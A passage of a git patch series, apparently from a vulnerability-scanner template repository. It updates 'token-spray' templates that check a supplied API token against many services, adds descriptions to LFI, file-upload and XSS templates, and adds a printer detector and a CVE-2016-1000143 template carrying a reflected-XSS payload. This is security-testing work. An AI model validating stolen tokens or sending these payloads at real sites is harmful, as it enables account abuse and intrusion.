b/token-spray/google-placesphoto.yaml index 82f33c2e1d..88790a68ec 100644 --- a/token-spray/google-placesphoto.yaml +++ b/token-spray/google-placesphoto.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml index 2e38d6316a..e034096bfc 100644 --- a/token-spray/google-playablelocations.yaml +++ b/token-spray/google-playablelocations.yaml @@ -11,6 +11,7 @@ requests: path: - "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml index c97cfcee59..4efb960afd 100644 --- a/token-spray/google-routetotraveled.yaml +++ b/token-spray/google-routetotraveled.yaml @@ -11,6 +11,7 @@ requests: path: - "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml index 5eec3d0a53..dd06969472 100644 --- a/token-spray/google-speedlimit.yaml +++ b/token-spray/google-speedlimit.yaml @@ -11,6 +11,7 @@ requests: path: - "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml index d4a012bff2..5011053baf 100644 --- a/token-spray/google-staticmaps.yaml +++ b/token-spray/google-staticmaps.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml index 49d043391d..cc0344919f 100644 --- a/token-spray/google-streetview.yaml +++ b/token-spray/google-streetview.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml index 273101bcc9..33f8002db5 100644 --- a/token-spray/google-timezone.yaml +++ b/token-spray/google-timezone.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml index c3683703cf..29e5fcca5a 100644 --- a/token-spray/googlet-extsearchplaces.yaml +++ b/token-spray/googlet-extsearchplaces.yaml @@ -11,6 +11,7 @@ requests: path: - "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml index 9f08e416d5..ec76722f11 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/heroku.yaml @@ -15,6 +15,7 @@ requests: Accept: application/vnd.heroku+json; version=3 Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml index 86566864f0..b1a796d113 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/hubspot.yaml @@ -13,6 +13,7 @@ requests: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml index 289546f452..8ab1b9131d 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/instagram.yaml @@ -12,6 +12,7 @@ requests: path: - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml index f64daea02e..4c912bf0b7 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/ipstack.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index 0c1f84d566..a4d77e7575 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -14,6 +14,7 @@ requests: headers: Api_Key: "{{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml index a885c5c780..cdfbdba931 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/jumpcloud.yaml @@ -14,6 +14,7 @@ requests: headers: X-Api-Key: "{{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml index 0c937b51fa..5ca1351c6d 100644 --- a/token-spray/lokalise.yaml +++ b/token-spray/lokalise.yaml @@ -14,6 +14,7 @@ requests: headers: X-Api-Token: "{{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml index d0ed434602..2cbb1f4e69 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/loqate.yaml @@ -12,6 +12,7 @@ requests: path: - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml index 9d7073e46c..840ab656f4 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/mailchimp.yaml @@ -14,6 +14,7 @@ network: host: - "tls://smtp.mandrillapp.com:465" + self-contained: true matchers: - type: word words: diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml index 3667ba1c69..67d7c356bd 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/mailgun.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64('api:' + token)}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml index c4640d9695..5e68a1ec4b 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/mapbox.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml index d67d458faa..a0b6cddb77 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/nerdgraph.yaml @@ -16,6 +16,7 @@ requests: API-Key: "{{token}}" body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml index cfe2c86746..6105c678db 100644 --- a/token-spray/npm.yaml +++ b/token-spray/npm.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml index 1a9a5058e3..4c32828a44 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/openweather.yaml @@ -12,6 +12,7 @@ requests: path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml index fcc00d7e88..48756e267e 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/pagerduty.yaml @@ -15,6 +15,7 @@ requests: Accept: application/vnd.pagerduty+json;version=2 Authorization: Token token={{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml index 8ea141bcc0..5a46a542a8 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/pendo.yaml @@ -16,6 +16,7 @@ requests: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml index c52e04af9a..29e6e32c56 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/pivotaltracker.yaml @@ -14,6 +14,7 @@ requests: headers: X-TrackerToken: "{{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml index 5b5aead0dc..72480a7efc 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/postmark.yaml @@ -15,6 +15,7 @@ requests: Accept: application/json X-Postmark-Server-Token: "{{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml index b887b0b7d1..b84a41a488 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/sendgrid.yaml @@ -16,6 +16,7 @@ network: host: - "tls://smtp.sendgrid.net:465" + self-contained: true matchers: - type: word words: diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml index 2703830f3a..e9e2a0af1e 100644 --- a/token-spray/slack.yaml +++ b/token-spray/slack.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml index fdf0dc6724..9ca1db987c 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/sonarcloud.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64(token + ':')}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml index 2ccc098209..7cb306b924 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/spotify.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/square.yaml b/token-spray/square.yaml index 383e3ddc8a..2a5f7210fb 100644 --- a/token-spray/square.yaml +++ b/token-spray/square.yaml @@ -16,6 +16,7 @@ requests: Content-Type: application/json Authorization: Bearer {{token}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml index 16e358e75a..15dd931744 100644 --- a/token-spray/stripe.yaml +++ b/token-spray/stripe.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64(token + ':')}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml index 922e62848b..44598c428a 100644 --- a/token-spray/tinypng.yaml +++ b/token-spray/tinypng.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Basic {{base64('api:' + token)}} + self-contained: true matchers: - type: word part: header diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml index 5212516fc1..c17c49290f 100644 --- a/token-spray/travisci.yaml +++ b/token-spray/travisci.yaml @@ -15,6 +15,7 @@ requests: Travis-API-Version: 3 Authorization: token {{token}} + self-contained: true matchers: - type: status status: diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml index d648daa0d1..9657045185 100644 --- a/token-spray/twitter.yaml +++ b/token-spray/twitter.yaml @@ -14,6 +14,7 @@ requests: headers: Authorization: Bearer {{token}} + self-contained: true matchers: - type: word part: body diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml index a05d17e57a..d7d6c6b836 100644 --- a/token-spray/visualstudio.yaml +++ b/token-spray/visualstudio.yaml @@ -15,6 +15,7 @@ requests: Content-Type: application/json X-Api-Token: "{{token}}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml index b48ed5e79f..c54d184fc1 100644 --- a/token-spray/wakatime.yaml +++ b/token-spray/wakatime.yaml @@ -12,6 +12,7 @@ requests: path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" + self-contained: true matchers: - type: status status: diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml index 9c1a8e2874..79ddab793f 100644 --- a/token-spray/weglot.yaml +++ b/token-spray/weglot.yaml @@ -15,6 +15,7 @@ requests: Content-Type: application/json body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" + self-contained: true matchers: - type: word part: body diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml index 3ab7726092..1546808ea7 100644 --- a/token-spray/youtube.yaml +++ b/token-spray/youtube.yaml @@ -13,6 +13,7 @@ requests: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" matchers-condition: or + self-contained: true matchers: - type: word part: body From 68b63a9ca5e9e08532a27a16e26410ab6d752339 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 15 Oct 2021 00:18:16 +0530 Subject: [PATCH 04/39] misc readme update --- token-spray/README.md | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/token-spray/README.md b/token-spray/README.md index 24081b4662..e49667d4b7 100644 --- a/token-spray/README.md +++ b/token-spray/README.md @@ -1,15 +1,19 @@ ## About + This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). ## Usage -You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag. -```bash -# Run Nuclei specifying all the api templates: +**token-spray** are self-contained template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag. -nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest +```console +# Running token-spray templates against a single token to test +nuclei -t token-spray/ -var token=random-token-to-test + +# Running token-spray templates against a file containing multiple new line delimited tokens +nuclei -t token-spray/ -var token=file_with_tokens.txt ``` ## Credits -These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs. +These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs. \ No newline at end of file From 6d5e933128fe1078f1ab833cdc54e08fd097fc4f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 12:56:40 +0300 Subject: [PATCH 05/39] Add description --- vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml index f175d20028..a098023ed9 100644 --- a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml +++ b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml @@ -4,6 +4,7 @@ info: name: CS-Cart unauthenticated LFI author: 0x_Akoko severity: high + description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content. reference: https://cxsecurity.com/issue/WLB-2020100100 tags: cscart,lfi From 5c910ab3b4d0f90907f4f4d9c31eda2600477023 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 13:03:41 +0300 Subject: [PATCH 06/39] Add description --- vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index 73c8f7c160..3fca056486 100644 --- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: high tags: luftguitar + description: A vulnerability in Luftguitar CMS allows remote unauthenticated users to upload files to the remote service via the 'ftb.imagegallery.aspx' endpoint. reference: https://www.exploit-db.com/exploits/14991 requests: From d1684e7d67e743a5144bc8aa6ddf1f0aec94ecaf Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 13:10:29 +0300 Subject: [PATCH 07/39] Add description --- vulnerabilities/other/minimouse-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml index 2fe4f3ad61..22c5a7ef9a 100644 --- a/vulnerabilities/other/minimouse-lfi.yaml +++ b/vulnerabilities/other/minimouse-lfi.yaml @@ -4,6 +4,7 @@ info: name: Mini Mouse 9.2.0 - Path Traversal author: 0x_Akoko severity: high + description: A vulnerability in Mini Mouse allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter. reference: https://www.exploit-db.com/exploits/49744 tags: minimouse,lfi From e45550f4edfac6548cddd7da049c5cfb1d8078ee Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 13:10:34 +0300 Subject: [PATCH 08/39] Add description --- vulnerabilities/other/magicflow-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/magicflow-lfi.yaml b/vulnerabilities/other/magicflow-lfi.yaml index 19f61c01ef..08cf21df8d 100644 --- a/vulnerabilities/other/magicflow-lfi.yaml +++ b/vulnerabilities/other/magicflow-lfi.yaml @@ -4,6 +4,7 @@ info: name: MagicFlow - Local File Inclusion author: gy741 severity: critical + description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter. reference: https://www.seebug.org/vuldb/ssvid-89258 tags: magicflow,lfi From cfa3a798f3993de15c9b9a0413142bb2224f9352 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 13:17:58 +0300 Subject: [PATCH 09/39] Add description --- vulnerabilities/other/lucee-xss.yaml | 1 + vulnerabilities/other/openvpn-hhi.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/other/lucee-xss.yaml b/vulnerabilities/other/lucee-xss.yaml index 63a273a8a0..dea08e0297 100644 --- a/vulnerabilities/other/lucee-xss.yaml +++ b/vulnerabilities/other/lucee-xss.yaml @@ -4,6 +4,7 @@ info: name: Lucee Unauthenticated Reflected XSS author: incogbyte severity: medium + description: A vulnerability in Lucee allows remote attackers to inject arbitrary Javascript into the responses returned by the server. tags: lucee,xss requests: diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 2611426abb..7bcb4e1a2f 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -3,6 +3,7 @@ id: openvpn-hhi info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar + description: A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field. severity: info tags: openvpn,hostheader-injection From 4ee63b8bb2483c2185ba5e33e1310f182ccd0449 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 19 Oct 2021 20:38:03 +0530 Subject: [PATCH 10/39] Add files via upload --- exposed-panels/samsung-printer-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/samsung-printer-detect.yaml diff --git a/exposed-panels/samsung-printer-detect.yaml b/exposed-panels/samsung-printer-detect.yaml new file mode 100644 index 0000000000..e1d5389fa2 --- /dev/null +++ b/exposed-panels/samsung-printer-detect.yaml @@ -0,0 +1,22 @@ +id: samsung-printer-Detect +info: + name: SAMSUNG Printer Detection + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="SAMSUNG-Printer"' + tags: iot +requests: + - method: GET + path: + - "{{BaseURL}}/sws/index.html" + matchers-condition: and + matchers: + - type: word + words: + - ' SyncThru Web Service ' + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file From 8ac553e84409ee610e50c1f1cb944ecf48e1b931 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 19 Oct 2021 22:21:58 +0700 Subject: [PATCH 11/39] Create CVE-2016-1000143.yaml --- cves/2016/CVE-2016-1000143.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2016/CVE-2016-1000143.yaml diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml new file mode 100644 index 0000000000..95cc66fabf --- /dev/null +++ b/cves/2016/CVE-2016-1000143.yaml @@ -0,0 +1,32 @@ +id: CVE-2016-1000143 + +info: + name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 + tags: cve,cve2016,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4617e8fb069e3be5d858db742e372ee31b7b4d48 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 20 Oct 2021 14:16:18 +0530 Subject: [PATCH 12/39] more updates --- token-spray/asana.yaml | 4 ++-- token-spray/bingmaps.yaml | 2 +- token-spray/bitly.yaml | 2 +- token-spray/buildkite.yaml | 2 +- token-spray/buttercms.yaml | 2 +- token-spray/calendly.yaml | 2 +- token-spray/circleci.yaml | 2 +- token-spray/deviantart.yaml | 2 +- token-spray/dropbox.yaml | 2 +- token-spray/github.yaml | 2 +- token-spray/google-autocomplete.yaml | 2 +- token-spray/google-customsearch.yaml | 2 +- token-spray/google-directions.yaml | 2 +- token-spray/google-elevation.yaml | 2 +- token-spray/google-fcm.yaml | 2 +- token-spray/google-findplacefromtext.yaml | 2 +- token-spray/google-gedistancematrix.yaml | 2 +- token-spray/google-geocode.yaml | 2 +- token-spray/google-geolocation.yaml | 9 +++++---- token-spray/google-mapsembed.yaml | 2 +- token-spray/google-mapsembedadvanced.yaml | 2 +- token-spray/google-nearbysearch.yaml | 2 +- token-spray/google-nearestroads.yaml | 2 +- token-spray/google-placedetails.yaml | 2 +- token-spray/google-placesphoto.yaml | 2 +- token-spray/google-playablelocations.yaml | 2 +- token-spray/google-routetotraveled.yaml | 2 +- token-spray/google-speedlimit.yaml | 2 +- token-spray/google-staticmaps.yaml | 2 +- token-spray/google-streetview.yaml | 2 +- token-spray/google-timezone.yaml | 2 +- token-spray/googlet-extsearchplaces.yaml | 4 ++-- token-spray/heroku.yaml | 4 ++-- token-spray/hubspot.yaml | 2 +- token-spray/instagram.yaml | 2 +- token-spray/ipstack.yaml | 2 +- token-spray/iterable.yaml | 2 +- token-spray/jumpcloud.yaml | 2 +- token-spray/lokalise.yaml | 2 +- token-spray/loqate.yaml | 2 +- token-spray/mailchimp.yaml | 2 +- token-spray/mailgun.yaml | 2 +- token-spray/mapbox.yaml | 2 +- token-spray/nerdgraph.yaml | 2 +- token-spray/npm.yaml | 2 +- token-spray/openweather.yaml | 2 +- token-spray/pagerduty.yaml | 2 +- token-spray/pendo.yaml | 2 +- token-spray/pivotaltracker.yaml | 2 +- token-spray/postmark.yaml | 2 +- token-spray/sendgrid.yaml | 2 +- token-spray/slack.yaml | 2 +- token-spray/sonarcloud.yaml | 2 +- token-spray/spotify.yaml | 2 +- token-spray/square.yaml | 2 +- token-spray/stripe.yaml | 2 +- token-spray/tinypng.yaml | 2 +- token-spray/travisci.yaml | 2 +- token-spray/twitter.yaml | 2 +- token-spray/visualstudio.yaml | 2 +- token-spray/wakatime.yaml | 2 +- token-spray/weglot.yaml | 2 +- token-spray/youtube.yaml | 5 +++-- 63 files changed, 72 insertions(+), 70 deletions(-) diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml index 08645bbe99..482dc7bdd9 100644 --- a/token-spray/asana.yaml +++ b/token-spray/asana.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,asana +self-contained: true requests: - method: GET path: @@ -14,9 +15,8 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status + negative: true status: - 401 - negative: true diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml index 86e6784911..17c0d216aa 100644 --- a/token-spray/bingmaps.yaml +++ b/token-spray/bingmaps.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,bing,maps,bingmaps +self-contained: true requests: - method: GET path: - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml index 31eea7a7e7..01c70c7974 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/bitly.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,bitly +self-contained: true requests: - method: GET path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml index c2129bc7dd..350b8edd1b 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/buildkite.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,buildkite +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml index f37c091c85..15d86d53fe 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/buttercms.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,buttercms +self-contained: true requests: - method: GET path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml index 1f2c1f434e..b54a5c8df8 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/calendly.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,calendly +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: X-Token: "{{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml index 0e1d78ca22..d519f10651 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/circleci.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,circle,circleci +self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml index 96b90b34b1..ab73e7ea0d 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/deviantart.yaml @@ -7,13 +7,13 @@ info: severity: info tags: token-spray,deviantart +self-contained: true requests: - method: POST path: - "https://www.deviantart.com/api/v1/oauth2/placebo" body: "access_token={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml index e1f7bf1625..339837160e 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/dropbox.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,dropbox +self-contained: true requests: - method: POST path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/github.yaml b/token-spray/github.yaml index 944225f0fe..4722dfe6d3 100644 --- a/token-spray/github.yaml +++ b/token-spray/github.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,github +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64('user:' + token)}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml index d6fee5de42..ae81be1c96 100644 --- a/token-spray/google-autocomplete.yaml +++ b/token-spray/google-autocomplete.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,autocomplete +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml index 0a77ff06fb..61af504633 100644 --- a/token-spray/google-customsearch.yaml +++ b/token-spray/google-customsearch.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,search +self-contained: true requests: - method: GET path: - 